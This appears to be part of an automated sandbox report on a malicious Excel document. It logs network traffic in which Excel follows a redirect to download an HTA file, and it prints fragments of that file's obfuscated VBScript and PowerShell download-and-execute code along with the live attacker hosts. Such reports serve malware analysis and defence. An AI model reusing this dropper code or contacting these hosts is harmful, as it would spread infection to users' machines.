                                      Mar 10, 2025 09:13:41.084273100 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.084294081 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.084525108 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.084525108 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.084553003 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.088443995 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.088458061 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.088506937 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.088515997 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.088557959 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.095480919 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.095499039 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.095552921 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.095565081 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.095593929 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.100622892 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.100636959 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.100733042 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.100733042 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.100747108 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.105842113 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.105880976 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.105945110 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.105954885 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.106070042 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.146033049 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.146051884 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.146136045 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.146151066 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.156685114 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.156708002 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.156794071 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.156809092 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.173243999 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.173265934 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.173459053 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.173475981 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.177741051 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.177762032 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.177802086 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.177824020 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.177947998 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.183459044 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.183475971 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.183517933 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.183533907 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.183568001 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.189472914 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.189493895 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.189532995 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.189548969 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.189696074 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.194183111 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.194207907 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.194441080 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.194454908 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.199985027 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.200005054 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.200117111 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.200117111 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.200129032 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.239800930 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.239828110 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.240334988 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.240365028 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.250623941 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.250657082 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.250705004 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.250718117 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.250895023 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.264195919 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.264218092 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.264338017 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.264338017 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.264353037 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.268388987 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.268409967 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.268570900 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.268570900 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.268584013 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.274297953 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.274313927 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.274626017 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.274638891 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.279861927 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.279882908 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.280025005 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.280025005 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.280036926 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.284185886 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:41.284636974 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.284636974 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.284636974 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.594221115 CET49704443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:41.594245911 CET4434970413.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:46.194590092 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.194629908 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:46.194703102 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.194787979 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.194834948 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:46.194960117 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.195023060 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.195045948 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:46.195765972 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:46.195794106 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.204514980 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.205240965 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.205260992 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.206361055 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.206367016 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.226932049 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.227540016 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.227559090 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.228969097 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.228974104 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.800518990 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.803256035 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.803303957 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.825098991 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.825129032 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.825190067 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.825206041 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.825248957 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.825294971 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.847234964 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.847259998 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.847271919 CET49706443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.847279072 CET4434970613.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.855309010 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.855333090 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.855344057 CET49707443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.855350971 CET4434970713.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.867810011 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.867832899 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.867928028 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.868365049 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.868385077 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.869757891 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.869791031 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:48.869851112 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.870038986 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:48.870055914 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.888206005 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.888268948 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:50.889693022 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:50.889703035 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.889911890 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.891402006 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:50.932323933 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.976636887 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.976759911 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:50.977988005 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:50.978001118 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.978271008 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:50.980206966 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.020330906 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.340208054 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.340260029 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.340352058 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.340684891 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.340701103 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.340712070 CET49709443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.340717077 CET4434970913.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.436269999 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.436289072 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.436371088 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.436372042 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.436417103 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.436750889 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.436750889 CET49708443192.168.2.713.107.253.72
                                      Mar 10, 2025 09:13:51.436769962 CET4434970813.107.253.72192.168.2.7
                                      Mar 10, 2025 09:13:51.436778069 CET4434970813.107.253.72192.168.2.7
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 10, 2025 09:13:21.612929106 CET5965653192.168.2.71.1.1.1
                                      Mar 10, 2025 09:13:21.651396036 CET53596561.1.1.1192.168.2.7
                                      Mar 10, 2025 09:13:37.739823103 CET5016153192.168.2.71.1.1.1
                                      Mar 10, 2025 09:13:37.749355078 CET53501611.1.1.1192.168.2.7
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Mar 10, 2025 09:13:21.612929106 CET192.168.2.71.1.1.10x1298Standard query (0)link.saja.marketA (IP address)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.739823103 CET192.168.2.71.1.1.10xd24eStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Mar 10, 2025 09:12:35.098664045 CET1.1.1.1192.168.2.70x56eNo error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:12:35.098664045 CET1.1.1.1192.168.2.70x56eNo error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:12:35.098664045 CET1.1.1.1192.168.2.70x56eNo error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                                      Mar 10, 2025 09:12:35.098664045 CET1.1.1.1192.168.2.70x56eNo error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                                      Mar 10, 2025 09:13:21.651396036 CET1.1.1.1192.168.2.70x1298No error (0)link.saja.marketistio.saja.marketCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:21.651396036 CET1.1.1.1192.168.2.70x1298No error (0)istio.saja.marketservice-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:21.651396036 CET1.1.1.1192.168.2.70x1298No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.153.44A (IP address)IN (0x0001)false
                                      Mar 10, 2025 09:13:21.651396036 CET1.1.1.1192.168.2.70x1298No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.89.152A (IP address)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 10, 2025 09:13:37.749355078 CET1.1.1.1192.168.2.70xd24eNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                      • link.saja.market
                                      • otelrules.svc.static.microsoft
                                      • 198.23.187.151
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749702198.23.187.151807088C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      Mar 10, 2025 09:13:24.773556948 CET248OUTGET /xampp/emino/emi/seenbestthingsentiretimetogivemebest.hta HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Connection: Keep-Alive
                                      Host: 198.23.187.151
                                      Mar 10, 2025 09:13:25.276870966 CET1236INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:25 GMT
                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                      Last-Modified: Mon, 10 Mar 2025 05:09:54 GMT
                                      ETag: "3a15-62ff5fb95e765"
                                      Accept-Ranges: bytes
                                      Content-Length: 14869
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: application/hta
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 63 52 49 50 74 20 54 59 50 45 3d 22 74 45 78 54 2f 76 62 73 63 52 69 50 54 22 3e 0d 0a 44 69 6d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 66 41 42 4d 79 43 69 4b 6b [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><ScRIPt TYPE="tExT/vbscRiPT">Dim dfABMyCiKkOvwWiUnKpvntxKuiPQTyWzQXJRjTesRJGcZPRYQNYUsxelKPnmmBhDAnLRUPqISPRRtzsNwSNmfTWpAiSzqMlqujiUFUpabJXirGMkvhlTnpcTftfaUMiHOUAxgPcoHAAxKTbibPSjFtwRPFDjLicyWBqTnkEuYwafkVmDCXlEWNheRaNvFKTKhmgFMMYopFaBItwrnORzbfkDBMkgqZJmJkwbtdlPVjbhRVGsxwlp ,
                                      Mar 10, 2025 09:13:25.276885033 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 78 50 55 6c 7a 73 76 6e 5a 76 58 50 62 78 42 6b 4b 66 53 46 46 72 45 73 4c 61 4e 4a
                                      Data Ascii: dxPUlzsvnZvXPbxBkKfSFFrEsLaNJADyAkiWJtRAoQfqrCGSFkqZUGDfnELHNZYLrhlhUqwCNFgYoaisOMMMDNHoyMPNvaaroVawfyHXvcAOXFEwxWubUkgAPSmaVLlLhkCKFYbfdOnKFzxzxxrNidCjZFepCofpLGTSKZfvzwxECOnWBXDRHBvLRFtCFS
                                      Mar 10, 2025 09:13:25.277031898 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: =
                                      Mar 10, 2025 09:13:25.277044058 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: )
                                      Mar 10, 2025 09:13:25.277054071 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 4e 4f 50 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: -NOP -w 1 -C dEVicecReDeNtIAldeplOymeNt.EXE ;
                                      Mar 10, 2025 09:13:25.277062893 CET1236INData Raw: 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4c 55 35 42 54 55 56 54 55 47 46 6a 52 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49
                                      Data Ascii: gICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9helNFdyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkZLVTRaMmI6OlVSTERvd25sb2FkVG9GaWxlKD
                                      Mar 10, 2025 09:13:25.277072906 CET776INData Raw: 56 47 73 78 77 6c 70 2e 52 55 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: VGsxwlp.RUN ChR
                                      Mar 10, 2025 09:13:25.277084112 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: ) &
                                      Mar 10, 2025 09:13:25.277093887 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: &
                                      Mar 10, 2025 09:13:25.277103901 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: CHr
                                      Mar 10, 2025 09:13:25.285687923 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: &


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.7497003.39.153.444437088C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:24 UTC225OUTGET /qhFdyeUknz?&love=waggish&nephew HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Host: link.saja.market
                                      Connection: Keep-Alive
                                      2025-03-10 08:13:24 UTC515INHTTP/1.1 302 Found
                                      Date: Mon, 10 Mar 2025 08:13:24 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 100
                                      Connection: close
                                      x-dns-prefetch-control: off
                                      x-frame-options: SAMEORIGIN
                                      strict-transport-security: max-age=15552000; includeSubDomains
                                      x-download-options: noopen
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1; mode=block
                                      location: http://198.23.187.151/xampp/emino/emi/seenbestthingsentiretimetogivemebest.hta
                                      vary: Accept
                                      x-envoy-upstream-service-time: 4
                                      server: istio-envoy
                                      2025-03-10 08:13:24 UTC100INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 32 33 2e 31 38 37 2e 31 35 31 2f 78 61 6d 70 70 2f 65 6d 69 6e 6f 2f 65 6d 69 2f 73 65 65 6e 62 65 73 74 74 68 69 6e 67 73 65 6e 74 69 72 65 74 69 6d 65 74 6f 67 69 76 65 6d 65 62 65 73 74 2e 68 74 61
                                      Data Ascii: Found. Redirecting to http://198.23.187.151/xampp/emino/emi/seenbestthingsentiretimetogivemebest.hta


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.74970413.107.253.724437088C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      TimestampBytes transferredDirectionData
                                      2025-03-10 08:13:39 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept-Encoding: gzip
                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                      Host: otelrules.svc.static.microsoft
                                      2025-03-10 08:13:40 UTC493INHTTP/1.1 200 OK
                                      Date: Mon, 10 Mar 2025 08:13:40 GMT
                                      Content-Type: text/plain
                                      Content-Length: 1114783
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Cache-Control: public
                                      Last-Modified: Sun, 09 Mar 2025 06:27:07 GMT
                                      ETag: "0x8DD5ED36A70D4F4"
                                      x-ms-request-id: b2cddfeb-801e-0035-3bf9-90752a000000
                                      x-ms-version: 2018-03-28
